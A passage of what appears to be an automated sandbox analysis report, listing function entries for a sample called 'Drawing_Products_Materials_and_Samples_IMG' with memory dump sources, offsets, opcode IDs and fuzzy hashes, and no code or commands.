                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5cafd784758ac7bff152609a30958159698f5817fe601c6bdd4930df4a98f551
                                                                                      • Instruction ID: b6d3a1cb063ddc181a8d7b50219bccb12b0c83e5293293d69e0798abb02bd43f
                                                                                      • Opcode Fuzzy Hash: 5cafd784758ac7bff152609a30958159698f5817fe601c6bdd4930df4a98f551
                                                                                      • Instruction Fuzzy Hash: F8D19174E003188FEB54DFA9C994B9DBBB2BF89300F2081A9D409BB354DB355A82DF55
                                                                                      Function 36A9E2C0 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fb40d6beda6a6dd9edd2feb6fe49fbf141d5c587b8a081d73ec95ea1b8d4b5c3
                                                                                      • Instruction ID: be83097ddc8bd49dbd9ec24e80785f074b09e42f700d9db2518488ccb540fce4
                                                                                      • Opcode Fuzzy Hash: fb40d6beda6a6dd9edd2feb6fe49fbf141d5c587b8a081d73ec95ea1b8d4b5c3
                                                                                      • Instruction Fuzzy Hash: C4C1AE74E00318CFEB54DFA5C984B9DBBF2BF89304F2081A9D809AB255DB359A81CF54
                                                                                      Function 36A9DA10 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d7113ee5163f5df643e15edab9ce31c58c04b254e419c362d100203f609b6ffc
                                                                                      • Instruction ID: e1c50b41404e19c62ef638c0f27cabd4621ac060bbde7bbe9dcc76a76a930e64
                                                                                      • Opcode Fuzzy Hash: d7113ee5163f5df643e15edab9ce31c58c04b254e419c362d100203f609b6ffc
                                                                                      • Instruction Fuzzy Hash: 5DC1AF74E00318CFEB54DFA5C980B9DBBF2BF89304F2081A9D809AB255DB359A81DF54
                                                                                      Function 36A9DE68 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a518f7ebe54e96ecc2ad6162f768f4e0d852fa63d207ba6f191269caedfe420e
                                                                                      • Instruction ID: 27f3ed30e3b4ed608ee40075b12737a53e4d94579ede7bc8bba1f305bfbdc989
                                                                                      • Opcode Fuzzy Hash: a518f7ebe54e96ecc2ad6162f768f4e0d852fa63d207ba6f191269caedfe420e
                                                                                      • Instruction Fuzzy Hash: DDC1AE74E00318CFEB54DFA5C980B9DBBF2BF89304F2081A9D809AB255DB359A81DF54
                                                                                      Function 36A9EFC8 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c0671890467b8388cfcc081a2bf43bf8288bd13d7c6aded5dc7618d7bf563156
                                                                                      • Instruction ID: daa5acc65de3ca165520e6bc51f2629919ecd627721616b6ba38e8586d3e57a8
                                                                                      • Opcode Fuzzy Hash: c0671890467b8388cfcc081a2bf43bf8288bd13d7c6aded5dc7618d7bf563156
                                                                                      • Instruction Fuzzy Hash: 8FC1AF74E00318CFEB54DFA5C984B9DBBF2BF89304F2081A9D809AB255DB349A81DF54
                                                                                      Function 36A98F38 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8e501a6835e0d4d73b1ba357eb389b0b8c003b187bf3ddbbacec199e691cb49e
                                                                                      • Instruction ID: f67a08eb84abff28f9e350dfcd2a16223ff2439d50df1473becef38e4253747d
                                                                                      • Opcode Fuzzy Hash: 8e501a6835e0d4d73b1ba357eb389b0b8c003b187bf3ddbbacec199e691cb49e
                                                                                      • Instruction Fuzzy Hash: 71A1C271E047189BEB18DFBAD9502DEBBF2AF89310F248569D815AB390DB358D01CB91
                                                                                      Function 36A9E718 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 962b3e05d532b375adf3fba969c17a8e98cf7b17015edc27265873b70c7434c6
                                                                                      • Instruction ID: 7e02b3622f3a7dc9255f40934c987975847e9d2108f0bc282f3f78426697ad29
                                                                                      • Opcode Fuzzy Hash: 962b3e05d532b375adf3fba969c17a8e98cf7b17015edc27265873b70c7434c6
                                                                                      • Instruction Fuzzy Hash: DDC19F74E01318CFEB54DFA5C984B9DBBF2BF89304F2081A9D809AB255DB359A81CF54
                                                                                      Function 36A9EB70 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 77baa7d6b903f1fe36bba9ac53fa550bda285f62c20c8bff57405eb71a9a7a19
                                                                                      • Instruction ID: acd733e926c7c8c0bac902a49373a6d562fce2dda7f619ac6c7a906cc2975f01
                                                                                      • Opcode Fuzzy Hash: 77baa7d6b903f1fe36bba9ac53fa550bda285f62c20c8bff57405eb71a9a7a19
                                                                                      • Instruction Fuzzy Hash: DEC19E74E003188FEB54DFA5C984B9DBBF2BF89304F2081A9D809AB255DB359A81DF54
                                                                                      Function 36A9C8B0 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 326a503cb535e69dbbae699042626419028dbc59a8a733132edf1c8cfe83e044
                                                                                      • Instruction ID: d8520a316381e9c7e0a54ee976b313bf06c8bb785df6a661ae74f6ab25531986
                                                                                      • Opcode Fuzzy Hash: 326a503cb535e69dbbae699042626419028dbc59a8a733132edf1c8cfe83e044
                                                                                      • Instruction Fuzzy Hash: 5CC1AF74E00318CFEB54DFA5C984B9DBBF2BF8A304F2081A9D809AB255DB355A81DF54
                                                                                      Function 36A9F420 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 48bf1a4cd9ffc4796d5f43eb0f1d41b1ddeaf063659335aa2e0f5fac125cea37
                                                                                      • Instruction ID: 31ca05bd569e549febf30eca2d58ef4a868581b4eb59f61755c3d553b54407a3
                                                                                      • Opcode Fuzzy Hash: 48bf1a4cd9ffc4796d5f43eb0f1d41b1ddeaf063659335aa2e0f5fac125cea37
                                                                                      • Instruction Fuzzy Hash: 16C19F74E00318CFEB54DFA5C984B9DBBF2BF89304F2081A9D809AB255DB355A81DF54
                                                                                      Function 36A9F878 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1cbebe76498c1eeed40176ef373089ba9267ab8c7060bf102b187ecd96c84b8c
                                                                                      • Instruction ID: 91146fec3f483a0afaf8839725acb4d044ce8d32c19b87ed95ae406c8be0250c
                                                                                      • Opcode Fuzzy Hash: 1cbebe76498c1eeed40176ef373089ba9267ab8c7060bf102b187ecd96c84b8c
                                                                                      • Instruction Fuzzy Hash: 5FC19F74E00318CFEB54DFA5C984B9DBBF2BF89304F2081A9D809AB255DB359A81DF54
                                                                                      Function 36A9D5B8 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cea7f6041c9c5c4fe9a94dd04774fb3fdb888267ba9a1338df808aeeb9b525e7
                                                                                      • Instruction ID: 2b014c1b49f9c013cb9f8fe3a3f5eb56481bedbd0cc62b033aead0bb7be186a8
                                                                                      • Opcode Fuzzy Hash: cea7f6041c9c5c4fe9a94dd04774fb3fdb888267ba9a1338df808aeeb9b525e7
                                                                                      • Instruction Fuzzy Hash: 8CC1AE74E00318CFEB54DFA5C990B9DBBF2BF89304F2081A9D809AB255DB359A81DF54
                                                                                      Function 36A9CD08 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f23667216ae840bca748e22742225c02b1715d4bbf4a63ca858d3007f937c500
                                                                                      • Instruction ID: 0082c60d55669badf42bd1b17c46fd3ea9ff32d15b7fb7869f223ded242fce36
                                                                                      • Opcode Fuzzy Hash: f23667216ae840bca748e22742225c02b1715d4bbf4a63ca858d3007f937c500
                                                                                      • Instruction Fuzzy Hash: DAC1A074E00318CFEB54DFA5C980B9DBBF2BF89304F2081A9D809AB255DB355A81CF54
                                                                                      Function 36A9D160 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a62adaf58264a4ae31e180f51b7383082400672d5ed13204ca524a1a1df6b1a7
                                                                                      • Instruction ID: 38562b9f3da1c477f9e3b90a7c2ad8dc0da1241f50cc0dbd31e4865f96bd3e6c
                                                                                      • Opcode Fuzzy Hash: a62adaf58264a4ae31e180f51b7383082400672d5ed13204ca524a1a1df6b1a7
                                                                                      • Instruction Fuzzy Hash: C7C1A074E00318CFEB54DFA5C984B9DBBF2BF89304F2081A9D809AB255DB359A81DF54
                                                                                      Function 37365330 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f3d51d5baa1aa27e216f4037295668f1fc4e2dcb5bd0ab6291b96708956b1fee
                                                                                      • Instruction ID: bd7bae7f74f812e799da2c68cc5f540e7e26972af6020919e91486dd79577a3b
                                                                                      • Opcode Fuzzy Hash: f3d51d5baa1aa27e216f4037295668f1fc4e2dcb5bd0ab6291b96708956b1fee
                                                                                      • Instruction Fuzzy Hash: 37C1BF74E00318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB355DB359A81DF54
                                                                                      Function 37367730 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 624844a854f15459f76ab7f9bcaa1d7a27347c53a5e21b63212340b445af125b
                                                                                      • Instruction ID: 1ad076dbe6defcd2338a60b8a4430fcae121587005eac2a1dbd8a0ec44b1a77a
                                                                                      • Opcode Fuzzy Hash: 624844a854f15459f76ab7f9bcaa1d7a27347c53a5e21b63212340b445af125b
                                                                                      • Instruction Fuzzy Hash: A1C1BF74E00318CFEB54DFA5C984B9DBBB2BF89304F6081A9D809AB355DB359A81CF54
                                                                                      Function 37362758 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d2b66a19c2740ea819243e2c5a52b2e12dc9b7626b606e1d7812dba165475c5a
                                                                                      • Instruction ID: ccdcf31e826aec9a43273c5a20be372ec6cd1593979259033761c55b6ad06ea7
                                                                                      • Opcode Fuzzy Hash: d2b66a19c2740ea819243e2c5a52b2e12dc9b7626b606e1d7812dba165475c5a
                                                                                      • Instruction Fuzzy Hash: BBC1A074E04318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB255DB359A81CF14
                                                                                      Function 37362BB0 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7783d553cdcb9ff71c4676220abc48014006cb7bdc34c6bb1d7db17fea0d6ded
                                                                                      • Instruction ID: a633dcbfb632189fe29203dbe19fb33ea6107081946eb12802d5358cb2d4a576
                                                                                      • Opcode Fuzzy Hash: 7783d553cdcb9ff71c4676220abc48014006cb7bdc34c6bb1d7db17fea0d6ded
                                                                                      • Instruction Fuzzy Hash: 51C1BE74E01318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB354DB349A81DF14
                                                                                      Function 37365788 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fade9c1c0f1cf8fc689e4fe3255cfcbe7126c1c464d8a584562235fd814c21f7
                                                                                      • Instruction ID: bd22e5631b4581a205c61fa2a0c909b85dfbd2f3ff3029567f7661092da4e30c
                                                                                      • Opcode Fuzzy Hash: fade9c1c0f1cf8fc689e4fe3255cfcbe7126c1c464d8a584562235fd814c21f7
                                                                                      • Instruction Fuzzy Hash: 45C1BF74E01318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB355DB359A81DF14
                                                                                      Function 37365BE0 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 62a7425ba0584d145b8467f0eb5e22b998df7f7a543aa512f164aae522818860
                                                                                      • Instruction ID: 97e4181b940991ee464a3b254dced5c0ddec94b17df65b40160071b8b80446d9
                                                                                      • Opcode Fuzzy Hash: 62a7425ba0584d145b8467f0eb5e22b998df7f7a543aa512f164aae522818860
                                                                                      • Instruction Fuzzy Hash: A4C1B074E00318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB355DB359A81DF54
                                                                                      Function 37364628 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 16ebfedb6dedab9f1c0aa212458d52a49f211519c8ef1b75c66d8ba37b2ac1cd
                                                                                      • Instruction ID: 6f86110c23f48c5f02d90d5f9533ee42a8a23bd710648e47c14f8aeb13d4a3c4
                                                                                      • Opcode Fuzzy Hash: 16ebfedb6dedab9f1c0aa212458d52a49f211519c8ef1b75c66d8ba37b2ac1cd
                                                                                      • Instruction Fuzzy Hash: 58C1AF74E00318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB355DB359A81DF14
                                                                                      Function 37366A28 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 35b2917e90dccbdaec2c5db2b8bbd1ac7e5ce9633d38d0868598d7aa747fa8ee
                                                                                      • Instruction ID: 8306b18343f85da6e4f2b30685623b832003bf34c5e93444c88cf60a9956056c
                                                                                      • Opcode Fuzzy Hash: 35b2917e90dccbdaec2c5db2b8bbd1ac7e5ce9633d38d0868598d7aa747fa8ee
                                                                                      • Instruction Fuzzy Hash: 10C1AF74E00318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB355DB359A81DF54
                                                                                      Function 37361A50 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1310d3d68bcfbcd9534306bf713fbbea8fbc753f8d5205f5e574ff1e821e5e07
                                                                                      • Instruction ID: 5f09b764c2b5d81b4d9d104f074ba1ec7f3f2d3dc7539b8acefaf0784d8585b5
                                                                                      • Opcode Fuzzy Hash: 1310d3d68bcfbcd9534306bf713fbbea8fbc753f8d5205f5e574ff1e821e5e07
                                                                                      • Instruction Fuzzy Hash: 01C1A174E00318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB355DB359A81DF54
                                                                                      Function 37361EA8 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4cb892843494f4b8ed14aad953afd2df433ba9327f8cb0d37f9692abdb61ed12
                                                                                      • Instruction ID: edfcbac183ab7e525f543c6d3f88d00d1eb4448a6e23d64d505ffc7b3350aebf
                                                                                      • Opcode Fuzzy Hash: 4cb892843494f4b8ed14aad953afd2df433ba9327f8cb0d37f9692abdb61ed12
                                                                                      • Instruction Fuzzy Hash: 50C1B174E00318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB355DB359A81DF14
                                                                                      Function 37364A80 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8f0b31a81229c54620424de26d5ef96daae78be28854daa89628284ef5451e6b
                                                                                      • Instruction ID: 8bef15879ab5825949ababe67171f0087e2e6a7aab48cf788714bbaa0972406b
                                                                                      • Opcode Fuzzy Hash: 8f0b31a81229c54620424de26d5ef96daae78be28854daa89628284ef5451e6b
                                                                                      • Instruction Fuzzy Hash: 21C1B074E00318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB355DB349A81DF54
                                                                                      Function 37366E80 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9053bc30d1546cae464fc51a11ed012409c8b36758f6c99cf77db5f7ea285e12
                                                                                      • Instruction ID: 906a304e51ac68ec3768a61b5bee443a6c85f71ba66837527f158b2554f30046
                                                                                      • Opcode Fuzzy Hash: 9053bc30d1546cae464fc51a11ed012409c8b36758f6c99cf77db5f7ea285e12
                                                                                      • Instruction Fuzzy Hash: 10C1CF74E00318CFEB54DFA5C984B9DBBB2BF89304F6081A9D809AB355DB359A81CF10
                                                                                      Function 373672D8 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 98810c7e492aa9380e28c562036934bbc9c11ce1e87e106bdf5607afb438adef
                                                                                      • Instruction ID: ab4be700044598eeb5f626ff66c4f61ec82b0106b19448435a54aacb85759ca2
                                                                                      • Opcode Fuzzy Hash: 98810c7e492aa9380e28c562036934bbc9c11ce1e87e106bdf5607afb438adef
                                                                                      • Instruction Fuzzy Hash: B3C1B074E00318CFEB54DFA5C984B9DBBB2BF89304F6081A9D809AB354DB359A81CF54
                                                                                      Function 37364ED8 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 22ff675a82622a8c63474ed86a41bf87ca68c8b90d4a064ebab182b84ab3e1fe
                                                                                      • Instruction ID: 89ec77f1d78308dff57f1ea305840b88f7b4d0cf4d591d74aa5ed6b68d6fb265
                                                                                      • Opcode Fuzzy Hash: 22ff675a82622a8c63474ed86a41bf87ca68c8b90d4a064ebab182b84ab3e1fe
                                                                                      • Instruction Fuzzy Hash: 08C1B074E01318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB355DB359A81DF14
                                                                                      Function 37360D48 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bdfff040c3d842095d23240c7a39e79cbbb2eb325e483ab0d94d0f4c7f5d7ddc
                                                                                      • Instruction ID: 4d779b8b4e9a9a12a2a73daed1e4049f289a2d9b291d610f03687b15cd5a296d
                                                                                      • Opcode Fuzzy Hash: bdfff040c3d842095d23240c7a39e79cbbb2eb325e483ab0d94d0f4c7f5d7ddc
                                                                                      • Instruction Fuzzy Hash: 85C1AF74E01318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB355DB359A81DF14
                                                                                      Function 373611A0 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
